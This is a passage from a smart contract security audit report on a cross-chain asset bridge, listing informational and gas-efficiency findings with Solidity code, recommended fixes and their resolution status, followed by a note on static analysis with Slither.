receivedTransfer.executed = false; // SSTORE
} else {
receivedTransfer.receivedSoFar++; // SSTORE
}
Each field access triggers a storage operation, significantly increasing gas costs
Multiple redundant storage reads when accessing the same struct fields multiple times
Unnecessary interim storage writes for new transfers
It is recommended to use memory struct and perform a single storage write at the end:
ReceivedTransfer memory receivedTransfer = receivedTransfers[transfer.transferId];
if (receivedTransfer.receivedSoFar == 0) {
receivedTransfer = ReceivedTransfer({
recipient: transfer.recipient,
amount: transfer.amount,
unwrap: transfer.unwrap,
receivedSoFar: 1,
threshold: transfer.threshold,
originChainId: originChain,
executed: false,
cancelled: false
});
} else {
receivedTransfer.receivedSoFar++;
}
// Check threshold and emit event using memory values
if (receivedTransfer.receivedSoFar >= receivedTransfer.threshold) {
emit TransferExecutable(transfer.transferId);
}
// Single storage write at the end
receivedTransfers[transfer.transferId] = receivedTransfer;
SOLVED: The function is now more gas efficient.
// Informational
The BaseAssetBridge.sol contract uses a duration variable as a divisor in multiple functions without validating that it is non-zero. The duration is set in the constructor and cannot be modified afterwards, but lacks zero-value validation:
constructor(
address _owner,
uint256 _duration, // @audit No validation that it is > 0
address[] memory _bridges,
uint256[] memory _mintingLimits,
uint256[] memory _burningLimits
) OwnableInit(_owner) {
duration = _duration; // @audit Directly assigned without checks
// ...
}
The duration variable is used as a divisor in several critical functions:
function _changeMinterLimit(address _bridge, uint256 _limit) internal {
// ...
bridges[_bridge].minterParams.ratePerSecond = _limit / duration; // @audit Division by duration
// ...
}
function _changeBurnerLimit(address _bridge, uint256 _limit) internal {
// ...
bridges[_bridge].burnerParams.ratePerSecond = _limit / duration; // @audit Division by duration
// ...
}
If duration is set to 0 during deployment:
All functions using division by duration will revert
The bridge becomes completely unusable
A new contract deployment is required to fix the issue
It is recommended to add a duration validation in the constructor:
constructor(
address _owner,
uint256 _duration,
address[] memory _bridges,
uint256[] memory _mintingLimits,
uint256[] memory _burningLimits
) OwnableInit(_owner) {
if (_duration == 0) revert InvalidDuration();
duration = _duration;
// ...
}
SOLVED: Duration and addresses are now validated in AssetController's constructor.
// Informational
The ConnextAdapter contract's relayMessage function sets the _delegate parameter to address(0) when calling the Connext bridge's xcall function:
transferId = BRIDGE.xcall{value: _deductFee(msg.value)}(
destDomainId,
trustedAdapters[destChainId],
address(0), // _delegate: no address can update slippage or retry
0,
0,
abi.encode(BridgedMessage(message, msg.sender, destination))
);
This configuration prevents any address from updating the slippage tolerance or retrying failed transactions on the destination chain. The _delegate parameter is designed to specify an address with these capabilities, enhancing the robustness of cross-chain transfers.
It is recommended to modify the relayMessage function to set the _delegate parameter to a known, controlled address on the destination chain:
transferId = BRIDGE.xcall{value: _deductFee(msg.value)}(
destDomainId,
trustedAdapters[destChainId],
address(this), // _delegate: a controlled address that can update slippage and retry
0,
0,
abi.encode(BridgedMessage(message, msg.sender, destination))
);
SOLVED: The destination adapter is now set as the delegate in ConnextAdapter, and an exposed forceUpdateSlippage function has been added.
// Informational
The MessageControllerUpgradeable.sol contract implements role-based access control by inheriting from AccessControlUpgradeable, but does not use the provided onlyRole modifier. Instead, it performs manual role checks using if statements:
// Current implementation in multiple functions
if (!hasRole(DEFAULT_ADMIN_ROLE, msg.sender)) revert Controller_Unauthorised();
// OpenZeppelin's more efficient approach
modifier onlyRole(bytes32 role) {
_checkRole(role);
_;
}
The current implementation duplicates code across multiple functions and does not follow OpenZeppelin's standardized access-control pattern.
It is recommended to replace all manual role checks with OpenZeppelin's onlyRole modifier:
// Before
function setLocalAdapter(address[] memory adapters, bool[] memory enabled) public {
if (!hasRole(DEFAULT_ADMIN_ROLE, msg.sender)) revert Controller_Unauthorised();
// Function logic
}
// After
function setLocalAdapter(address[] memory adapters, bool[] memory enabled) public onlyRole(DEFAULT_ADMIN_ROLE) {
// Function logic
}
SOLVED: Roles are now checked with OZ modifiers in MessageController.
// Informational
It was identified that the OwnableInitUpgradeable and OwnableInit contracts expose renounceOwnership(). This function renounces the Owner permission. Renouncing ownership without first transferring it would leave the contract with no owner, permanently eliminating the ability to call privileged functions:
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
It is recommended to prevent the owner from calling renounceOwnership() without first transferring ownership to another address. In addition, if a multi-signature wallet is used, calls to renounceOwnership() should require confirmation by two or more signers.
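As one possible illustration of this recommendation (a sketch, not the audited code, and assuming OpenZeppelin Contracts v5, where Ownable takes an initialOwner constructor argument), the function can be overridden to revert unconditionally so that ownership can only move via transferOwnership():

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";

// Hypothetical example (not part of the audited codebase): disable
// renounceOwnership() so the owner can never be set to address(0).
contract NoRenounceOwnable is Ownable {
    error RenounceDisabled();

    constructor(address initialOwner) Ownable(initialOwner) {}

    // The override always reverts; ownership changes must go through
    // transferOwnership(), which rejects address(0) in OZ's implementation.
    function renounceOwnership() public override onlyOwner {
        revert RenounceDisabled();
    }
}
```

An alternative with the same effect is a two-step ownership handover (OpenZeppelin's Ownable2Step), which requires the new owner to accept before the transfer completes.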
ACKNOWLEDGED: The Lucid Labs team acknowledged the risk but won't implement a modification.
Halborn used automated testing techniques to enhance the coverage of certain areas of the smart contracts in scope. Among the tools used was Slither, a Solidity static analysis framework.
After Halborn verified the smart contracts in the repository and was able to compile them correctly into their ABIs and binary format, Slither was run against the contracts. This tool can statically verify mathematical relationships between Solidity variables to detect invalid or inconsistent usage of the contracts' APIs across the entire codebase.
All issues identified by Slither proved to be false positives or have been added to the issue list in this report.
Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.